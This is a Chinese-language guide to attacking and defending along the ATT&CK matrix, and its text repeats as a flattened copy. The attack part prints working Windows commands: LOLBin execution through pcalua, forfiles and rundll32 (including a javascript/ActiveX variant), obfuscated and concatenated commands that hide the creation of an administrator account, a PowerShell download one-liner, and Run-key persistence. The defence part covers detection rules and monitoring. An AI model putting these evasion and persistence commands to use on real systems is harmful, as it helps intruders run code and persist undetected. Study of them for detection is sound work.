ATT&CK矩阵的攻与防
字数 1077 2025-08-27 12:33:23

ATT&CK矩阵攻防实战指南

前言

ATT&CK框架是安全领域广泛使用的战术技术知识库,它将攻击者使用的技术以TTPs(战术、技术和程序)形式展现。本指南将从攻防双方视角深入分析ATT&CK矩阵的实际应用,提供可落地的技术方案。

执行阶段的攻防对抗

攻击者常用执行技术

  1. 文件扩展名替换

    • 使用非标准扩展名绕过检测:ps1, bat, vbs, dll, hta等
    • 示例:将恶意代码保存为.ps1而非.exe

  2. 语言脚本执行

    • 利用各种脚本语言执行系统命令: 
      python3 -c "import os;output=os.popen('C:/Users/xinxin/Desktop/mmm.exe');"
    • 其他语言:aspx, php, java, node.js等

  3. 第三方服务滥用

    • 利用合法软件执行恶意代码:7zip, WinRAR等
    • 防御难点:难以直接拉黑常用办公软件

  4. 白+黑技术

    • 利用系统合法组件执行恶意代码:
      • pcalua.exe: 
        Pcalua -m -a axgg.exe
      • forfiles.exe: 
        forfiles -P c:\windows\ /m *.prx /c "cmd /c c:\users\axingg\desktop\axgg.exe
      • rundll32.exe多种变形: 
        rundll32 advpack.dll RegisterOCX axgg.exe
rundll32 url.dll,FileProtocolHandler file://C:\Users\axingg\Desktop\axgg.exe
rundll32 url.dll,OpenURL axgg.exe
rundll32 zipfldr.dll, RouteTheCall axgg.exe
rundll32 javascript:"..\mshtml,RunHTMLApplication ";document.write("\74script language=javascript)"+(new%20ActiveXObject("WScript.Shell")).Run("axgg.exe")+"\74/script)")

  5. 命令混淆技术

    • 替换技术
      • 环境变量替换: 
        P%comspec:~20,1%alua -m -a axgg.%comspec:~24,1%x%comspec:~24,1%
      • 特殊字符替换: 
        forfiles /ᵖᵖᵖ c:\windows\ /m .prx /c "cmd /c c:\users\axingg\desktop\axgg.exe
    • 缩短技术
      • 命令缩写: 
        net1 user axgg 123456 /ad
      • PowerShell命令缩写: 
        iwr -uri http://192.168.1.28:1456/test.txt -o test.txt
    • 拼接技术
      set a1=er la&& set a2=ne&& set a3=t us&& set a4=cker qaz2022&& set a5=WSX /a&& set a6=d&&call echo %a2%%a3%%a1%%a4%%a5%%a6%

防御方案设计

  1. 进程白名单机制

    • 限制特定进程(如7zip)启动子进程
    • 实施难度:需要完善的企业基础设施支持

  2. 命令参数检测

    • 检测异常参数组合
    • 示例:检测pcalua的异常使用

  3. 注册表操作监控

    • 监控关键注册表项修改: 
      HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    • 防御绕过技术:
      • 攻击者可能使用reg import替代直接修改

  4. PowerShell防护策略

    • 可选检测方案:
      • 匹配已知恶意脚本特征(如PowerSploit, Empire)
      • 基于功能检测(下载、执行、-bypass等参数)
      • 实施微软PowerShell语言限制模式

权限维持技术分析

常见技术

  1. 注册表自启动

    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v axgg /t REG_SZ /d "C:\Users\axgg\evil.exe"

  2. 计划任务

    • 检测难点:区分合法与恶意计划任务

防御方案

  1. 注册表变更监控

    • 重点关注常见持久化位置
    • 检测异常修改行为

  2. 计划任务审计

    • 建立基线,检测异常任务创建
    • 结合其他指标判断恶意性

ATT&CK落地实践要点

  1. 检测规则设计考量

    • 准确率、误报率、召回率评估
    • 规则有效性验证(能否检测真实攻击)

  2. 安全运营基础设施

    • 支持ATT&CK框架的平台建设
    • 安全人员能力培养

  3. 攻防对抗思维

    • 从攻击者视角测试防御体系
    • 持续优化检测规则

  4. 多维度关联分析

    • 单一行为难以判定恶意性
    • 需要结合多个TTPs进行判断

总结

ATT&CK框架的有效应用需要:

  1. 深入理解各TTPs的实际表现形式
  2. 设计多层次的检测规则
  3. 建立完善的运营体系
  4. 持续进行攻防对抗测试
  5. 保持对新型绕过技术的研究

安全防御不是静态的规则集合,而是动态的对抗过程。防守方需要不断从攻击中学习,优化检测和响应能力。

ATT&CK矩阵攻防实战指南 前言 ATT&CK框架是安全领域广泛使用的战术技术知识库,它将攻击者使用的技术以TTPs(战术、技术和程序)形式展现。本指南将从攻防双方视角深入分析ATT&CK矩阵的实际应用,提供可落地的技术方案。 执行阶段的攻防对抗 攻击者常用执行技术 文件扩展名替换 使用非标准扩展名绕过检测:ps1, bat, vbs, dll, hta等 示例:将恶意代码保存为.ps1而非.exe 语言脚本执行 利用各种脚本语言执行系统命令: 其他语言:aspx, php, java, node.js等 第三方服务滥用 利用合法软件执行恶意代码:7zip, WinRAR等 防御难点:难以直接拉黑常用办公软件 白+黑技术 利用系统合法组件执行恶意代码: pcalua.exe: forfiles.exe: rundll32.exe多种变形: 命令混淆技术 替换技术 : 环境变量替换: 特殊字符替换: 缩短技术 : 命令缩写: PowerShell命令缩写: 拼接技术 : 防御方案设计 进程白名单机制 限制特定进程(如7zip)启动子进程 实施难度:需要完善的企业基础设施支持 命令参数检测 检测异常参数组合 示例:检测pcalua的异常使用 注册表操作监控 监控关键注册表项修改: 防御绕过技术: 攻击者可能使用 reg import 替代直接修改 PowerShell防护策略 可选检测方案: 匹配已知恶意脚本特征(如PowerSploit, Empire) 基于功能检测(下载、执行、-bypass等参数) 实施微软PowerShell语言限制模式 权限维持技术分析 常见技术 注册表自启动 计划任务 检测难点:区分合法与恶意计划任务 防御方案 注册表变更监控 重点关注常见持久化位置 检测异常修改行为 计划任务审计 建立基线,检测异常任务创建 结合其他指标判断恶意性 ATT&CK落地实践要点 检测规则设计考量 准确率、误报率、召回率评估 规则有效性验证(能否检测真实攻击) 安全运营基础设施 支持ATT&CK框架的平台建设 安全人员能力培养 攻防对抗思维 从攻击者视角测试防御体系 持续优化检测规则 多维度关联分析 单一行为难以判定恶意性 需要结合多个TTPs进行判断 总结 ATT&CK框架的有效应用需要: 深入理解各TTPs的实际表现形式 设计多层次的检测规则 建立完善的运营体系 持续进行攻防对抗测试 保持对新型绕过技术的研究 安全防御不是静态的规则集合,而是动态的对抗过程。防守方需要不断从攻击中学习,优化检测和响应能力。